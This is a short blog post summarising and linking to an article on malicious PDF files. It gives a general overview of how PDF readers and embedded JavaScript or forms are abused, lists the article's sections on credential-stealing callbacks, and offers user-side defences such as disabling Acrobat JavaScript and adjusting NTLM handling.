Malicious PDFs: Revealing the techniques behind the attacks

Posted on April 9, 2021 Click for: original source

Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. This is an older but useful article by Phil Stokes.

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat. Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document. “One of the easiest and most powerful ways to customize PDF files is by using JavaScript.” (Adobe)

Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.

The content of the article:

  • How Do PDF Files Execute Code?
  • Cleaning Up the Code
  • More Malicious JavaScript
  • Stealing Credentials with an SMB Attack
  • Another Day, Another Callback
  • Protecting Against PDF Attacks

It’s impossible to tell whether a PDF file contains a credential stealing-callback or malicious JavaScript before opening it, unless you actually inspect it in the ways we’ve shown here. Of course, for most users and most use cases, that’s not a practical solution.

There are, however, a couple of things you can do on the user-side. Most readers and browsers will have some form of JavaScript control. In Adobe’s Acrobat Reader DC, for example, you can disable Acrobat JavaScript in the Preferences and manage access to URLs. Similarly, with a bit of effort, users can also customize how Windows handles NTLM. To learn more follow the link to the full article. Good read!

[Read More]

Tags infosec cio cloud learning